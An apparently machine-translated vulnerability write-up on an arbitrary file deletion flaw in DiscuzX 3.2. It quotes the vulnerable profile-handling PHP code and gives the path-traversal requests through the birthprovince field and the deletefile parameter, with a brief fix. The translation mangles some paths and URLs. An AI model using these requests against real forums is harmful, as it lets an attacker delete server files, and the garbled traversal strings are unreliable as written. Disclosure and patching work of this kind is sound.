DiscuzX Arbitrary File Operation Vulnerability

DiscuzX Arbitrary File Operation Vulnerability

DiscuzX Arbitrary File Operation Vulnerability

The vulnerability is actually caused by the deletion of arbitrary files. However, the deletion function is easy to locate and therefore cannot be written in a brief description or title.

Download the DiscuzX 3.2 code yesterday.


Find the following code in source/include/spacecp/spacecp_profile.php:
 

if($_GET['deletefile'] && is_array($_GET['deletefile'])) {foreach($_GET['deletefile'] as $key => $value) {if(isset($_G['cache']['profilesetting'][$key])) {echo (getglobal('setting/attachdir').'./profile/'.$space[$key]);@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);@unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);$verifyarr[$key] = $setarr[$key] = '';}}}

No processing is found for $ _ GET ['deletefile'], and $ space [$ key] comes from


 

$space = getuserbyuid($_G['uid']);space_merge($space, 'field_home');space_merge($space, 'profile');

Therefore, we need to find a location in the $ space variable for the file to be deleted. The field I use is birthprovince.
 

We add the file to be deleted in birthprovince for the first time and save the information. Next time we submit $ _ GET ['deletefile'] [birthprovince], the file pointed to by $ space [birthprovince] will be deleted.

That is to say, we submit birthprovince as.../robots.txt





After saving, the $ space ['birthprovice '] in the database will become .. /.. /.. /robots.txt. When we submit $ _ GET ['deletefile'] [birthprovince], the file pointed to by $ space ['birthprovice'] will be deleted.



Procedure:



After logging in, submit:

Birthprovince =..././robots.txt & profilesubmit = 1 & formhash = 85cf7ef0

Note that 85cf7ef0 is your formhash.



Http: // localhost/dx/home. php? Mod = spacecp & ac = profile & op = base

Message: saved successfully.



At this time, your birthprovince is.../robots.txt. The generated $ space ['birthprovince '] is.../robots.txt.



Next we will perform parameter operations and submit:



Birthprovince =..././robots.txt & profilesubmit = 1 & formhash = 85cf7ef0

To



Http: // localhost/study/dx/home. php? Mod = spacecp & ac = profile & op = base & deletefile [birthprovince] = aaaaaa



OK. The file is deleted successfully.

Solution:

Check whether the key pointed to by deletefile is a field that allows FILES in a custom field.